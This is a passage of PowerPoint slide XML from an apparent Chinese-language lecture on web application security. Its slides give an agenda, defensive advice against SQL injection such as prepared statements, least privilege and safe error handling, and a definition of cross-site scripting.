            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>filter_var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句替换为存储过程、预编译</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加强</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库服务器的配置与连接 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>避免将敏感性数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>如口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>明文存放于数据库中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>最小权限原则配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>应用程序连接数据库的查询操作权限 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>实现一个不泄漏任何有价值信息的默认出错处理机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="708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E28C6BEC-A347-884B-A8CE-8E5E8E12676B}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51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D8B66AE6-BA1A-4941-A142-37F7CA57D909}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="1"/>
            <a:ext cx="8001000" cy="1052736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5126" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>应用程序体系结构及其安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="黑体" charset="0"/>
              <a:cs typeface="黑体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>应用安全攻防技术概述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="黑体" charset="0"/>
              <a:cs typeface="黑体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="黑体" charset="0"/>
              <a:cs typeface="黑体"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E28C6BEC-A347-884B-A8CE-8E5E8E12676B}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512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D8B66AE6-BA1A-4941-A142-37F7CA57D909}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691680" y="-99392"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5126" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>应用程序体系结构及其安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="黑体" charset="0"/>
              <a:cs typeface="黑体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>应用安全攻防技术概述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="黑体" charset="0"/>
              <a:cs typeface="黑体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="黑体" charset="0"/>
                <a:cs typeface="黑体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="黑体" charset="0"/>
              <a:cs typeface="黑体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218654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D5B72137-EC01-E041-BB46-1845197A7844}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5017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438E46C8-14F4-C042-96FA-670B29F0887B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="332656"/>
            <a:ext cx="8001000" cy="747936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(XSS: Cross-Site Scripting)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8220075" cy="4556125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>什么是跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>? (Wikipedia)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本是一种通常存在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序中的安全漏洞，使得攻击者可以将恶意的代码注入到网页中，从而危害其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>访问者。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>客户端脚本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ActionScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>与代码注入攻击的比较</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>相似的漏洞根源：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序没有对非预期输入做全面有效检查和净化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不同的最终攻击目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>站点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
